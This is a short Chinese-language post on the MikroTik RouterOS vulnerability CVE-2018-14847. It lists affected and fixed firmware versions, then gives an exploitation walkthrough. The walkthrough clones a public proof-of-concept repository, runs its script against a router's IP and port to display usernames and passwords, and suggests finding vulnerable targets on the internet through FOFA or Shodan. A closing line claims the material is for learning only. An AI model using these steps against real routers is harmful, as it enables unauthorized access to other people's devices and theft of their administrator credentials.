MikroTik RouterOS是一个基于Linux开发的网络设备操作系统,兼容x86、ARM、MIPS等多种CPU架构,因此RouterOS也可以安装在PC上将其作为软路由,提供防火墙、VPN、无线网络等多种功能与服务。RouterOS提供了多种途径对其进行管理与配置,包括SSH、Telnet、Web界面(Webfig)与客户端软件(Winbox)等。
来自全球知名高科技网络安全公司Tenable的安全研究人员Jacob Baines针对CVE-2018-14847发布了一段新的概念验证(PoC)代码,实现了在受漏洞影响的MikroTik路由器上的远程代码执行。
影响范围
6.42.7以及6.40.9之前的所有Mikrotik RouterOS固件版本
修复方式
RouterOS版本6.40.9、6.42.7、6.43
漏洞利用
下载CVE-2018-14847
git clone
https://github.com/jas502n/CVE-2018-14847
cd CVE-2018-14847
python WinboxExploit.py ip
利用FOFA搜索有漏洞的版本,ShoDan也可以。
搜索到目标后,利用CVE-2018-14847,语法为:
python3 WinboxExploit.py ip port
利用成功后会自动显示用户名和密码。
注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。
推荐文章++++